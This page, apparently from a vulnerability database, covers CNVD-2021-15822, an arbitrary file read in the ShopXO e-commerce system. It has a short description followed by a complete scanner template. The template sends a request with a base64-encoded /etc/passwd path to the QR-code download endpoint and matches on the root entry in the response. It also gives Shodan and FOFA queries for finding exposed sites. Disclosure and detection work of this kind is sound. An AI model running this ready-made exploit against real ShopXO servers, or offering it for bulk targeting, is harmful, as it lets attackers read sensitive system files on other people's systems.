CNVD-2021-15822: ShopXO Download File Read

日期: 2025-08-01 | 影响软件: ShopXO | POC: 已公开

漏洞描述

ShopXO is an open source enterprise-level open source e-commerce system. ShopXO has an arbitrary file reading vulnerability, which can be used by attackers to obtain sensitive information.

PoC代码[已公开]

id: CNVD-2021-15822

info:
  name: ShopXO Download File Read
  author: pikpikcu
  severity: high
  description: |
    ShopXO is an open source enterprise-level open source e-commerce system. ShopXO has an arbitrary file reading vulnerability, which can be used by attackers to obtain sensitive information.
  reference:
    - https://mp.weixin.qq.com/s/69cDWCDoVXRhehqaHPgYog
  classification:
    cpe: cpe:2.3:a:shopxo:shopxo:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: shopxo
    product: shopxo
    shodan-query: title:"ShopXO企业级B2C电商系统提供商"
    fofa-query: app="ShopXO企业级B2C电商系统提供商"
  tags: cnvd2021,cnvd,shopxo,lfi,vuln

http:
  - raw:
      - |
        GET /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q=  HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 490a00463044022018b7f1ec4526ea15e0837ef6030b3c71e6abae22986a5cc452c06952b0f8b45f02201d3693a05c9ed4bbe7cc5b143ed860c0bec0a95808eff942ee68f4b3b5f3d0b0:922c64590222798bb761d5b6d8e72950

相关漏洞推荐